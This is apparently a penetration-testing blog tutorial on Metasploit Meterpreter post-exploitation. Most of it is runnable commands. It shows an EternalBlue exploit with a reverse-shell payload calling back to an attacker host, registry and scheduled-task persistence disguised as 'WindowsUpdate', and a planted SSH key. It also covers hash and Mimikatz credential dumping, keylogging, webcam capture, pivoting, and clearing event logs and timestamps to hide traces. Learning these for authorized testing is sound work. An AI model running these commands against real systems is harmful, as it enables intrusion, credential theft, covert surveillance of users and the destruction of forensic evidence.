Ethical Hacking #metasploit#meterpreter#post-exploitation

Metasploit Post-Exploitation: Meterpreter Deep Dive

Master Metasploit post-exploitation with Meterpreter commands, privilege escalation, persistence, pivoting, hashdump, keylogging, and screenshots.

7 min read

Getting a shell is only the beginning. Post-exploitation — what you do after initial access — is where penetration testing proves its real value. It’s in this phase that you demonstrate actual business risk: access to credentials, sensitive data, lateral movement possibilities, and persistence. Metasploit’s Meterpreter is the most feature-rich post-exploitation agent available, offering an in-memory payload that leaves minimal disk artifacts while providing powerful capabilities.

Getting a Meterpreter Session

Meterpreter sessions are established through Metasploit exploit modules that use a Meterpreter payload. A typical setup:

msfconsole

# Use an exploit (example: EternalBlue)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
run

If successful, you drop into a Meterpreter prompt:

meterpreter >

Core Meterpreter Commands

System Information

sysinfo          # OS version, hostname, architecture
getuid           # Current user context
getpid           # Process ID of the Meterpreter agent
ps               # List all running processes

File System

pwd              # Print working directory
ls               # List directory contents
cd C:\\Users     # Change directory
download secrets.txt /tmp/  # Download file from target
upload tool.exe C:\\Temp\\  # Upload file to target
search -f *.txt -d C:\\     # Search for files
cat file.txt                # Read file contents

Networking

ipconfig         # Network interfaces and IPs
arp              # ARP cache (reveals other hosts)
route            # Routing table
portfwd add -l 8080 -p 80 -r 10.10.10.5  # Port forward

Privilege Escalation

Once you have a low-privilege session, the goal is typically to gain SYSTEM or root.

Windows: getsystem

getsystem

This command tries multiple techniques in sequence: named pipe impersonation, token impersonation, and service creation. If it succeeds, getuid returns NT AUTHORITY\SYSTEM.

Windows: Local Exploit Suggester

run post/multi/recon/local_exploit_suggester

This module analyzes the target’s OS version and patch level, then recommends local privilege escalation exploits from the Metasploit library. Filter by rank (Excellent or Great) and try them sequentially.

Token Impersonation with Incognito

load incognito
list_tokens -u          # List available tokens
impersonate_token "DOMAIN\\Administrator"

If a domain administrator has authenticated to the machine recently, their token may still be in memory. Incognito lets you impersonate it without knowing their password.

Linux: Sudo Enumeration

shell
sudo -l

If the compromised user can run commands as root via sudo — especially with NOPASSWD — escalation is trivial.

Persistence

Persistence mechanisms ensure continued access if the target reboots or the connection drops.

Windows Registry Run Key

run post/windows/manage/persistence_exe \
  STARTUP=REGISTRY \
  SESSION=1 \
  PAYLOAD=windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 \
  LPORT=4444

This drops a payload to disk and adds it to HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

Scheduled Task

run post/windows/manage/scheduledtask \
  TASK_NAME="WindowsUpdate" \
  COMMAND="C:\\Windows\\Temp\\payload.exe" \
  TRIGGER=LOGON

SSH Key (Linux)

shell
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Add your public key to the target’s authorized_keys for persistent SSH access.

Pivoting

Pivoting lets you route traffic through a compromised host to reach otherwise inaccessible network segments.

Adding a Route Through Meterpreter

# In meterpreter session
run post/multi/manage/autoroute SUBNET=10.10.10.0 NETMASK=255.255.255.0

# Back in msfconsole
route print

Now scans and exploits run from Metasploit will route through the compromised host into the internal network.

SOCKS Proxy for Tool Access

use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

Configure /etc/proxychains4.conf to use socks5 127.0.0.1 1080, then:

proxychains nmap -sT 10.10.10.0/24
proxychains curl http://10.10.10.5/admin/

Credential Harvesting

Hashdump

hashdump

Dumps local Windows account hashes from the SAM database. Requires SYSTEM privileges. Output format:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Pass the NTLM hash (last field) directly to pass-the-hash attacks or crack offline with Hashcat:

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

Mimikatz via Kiwi

load kiwi
creds_all           # Dump all available credentials
lsa_dump_sam        # SAM database hashes
lsa_dump_secrets    # LSA secrets (service accounts, cached creds)

Kiwi is the Meterpreter port of Mimikatz. It can extract plaintext passwords from LSASS memory on older Windows versions.

Keylogging

keyscan_start       # Begin capturing keystrokes
# Wait for the user to type
keyscan_dump        # Display captured keystrokes
keyscan_stop        # Stop logging

Keylogging captures typed credentials, messages, and commands in real time. Migrate into Explorer.exe first for better coverage:

migrate -N explorer.exe
keyscan_start

Screenshot and Webcam

screenshot          # Capture current desktop
webcam_list         # List webcam devices
webcam_snap         # Take a snapshot from webcam
run post/multi/gather/screen_spy INTERVAL=5  # Continuous screenshots

Session Management

# Background the session
background

# List all sessions
sessions -l

# Interact with a specific session
sessions -i 2

# Upgrade a basic shell to Meterpreter
sessions -u 1

Cleaning Up Traces

After a real authorized engagement, demonstrate cleanup:

clearev              # Clear Windows event logs (Application, System, Security)
timestomp file.exe -m "01/01/2020 12:00:00"  # Modify file timestamps

Post-exploitation in Metasploit gives you a structured, repeatable way to demonstrate the full impact of initial access — from a single foothold to domain-wide credential theft. Document every step for your report.

#pivoting #privilege-escalation #post-exploitation #meterpreter #metasploit